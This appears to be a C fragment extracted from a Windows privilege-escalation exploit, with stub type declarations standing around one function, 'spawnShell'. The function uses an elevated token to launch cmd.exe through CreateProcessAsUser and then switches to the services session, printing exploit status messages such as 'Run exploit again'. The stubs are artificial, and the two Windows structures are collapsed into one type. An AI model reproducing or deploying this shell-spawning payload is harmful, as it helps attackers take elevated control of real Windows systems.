
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_1__ ;


struct TYPE_6__ {int cb; char* lpDesktop; } ;
typedef TYPE_1__ STARTUPINFO ;
typedef TYPE_1__ PROCESS_INFORMATION ;
typedef int HANDLE ;


 int CREATE_NEW_CONSOLE ;
 int CreateProcessAsUser (int ,int *,char*,int *,int *,int ,int ,int *,int *,TYPE_1__*,TYPE_1__*) ;
 int FALSE ;
 int GetLastError () ;
 int WinStationSwitchToServicesSession () ;
 int ZeroMemory (TYPE_1__*,int) ;
 int printf (char*,...) ;

int spawnShell(HANDLE hTokenElevated)
{
    STARTUPINFO si;
    PROCESS_INFORMATION pi;


    ZeroMemory(&si, sizeof(STARTUPINFO));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
    si.cb = sizeof(STARTUPINFO);
    si.lpDesktop = "WinSta0\\Default";

    if (!CreateProcessAsUser(hTokenElevated, ((void*)0), "C:\\Windows\\System32\\cmd.exe", ((void*)0), ((void*)0), FALSE, CREATE_NEW_CONSOLE, ((void*)0), ((void*)0), &si, &pi))
    {
        printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError());
        return -1;
    }
    printf("\n[+] Executed command successfully");

    printf("\n[*] Switching session . . .\n\n");
    WinStationSwitchToServicesSession();

    return 0;
}
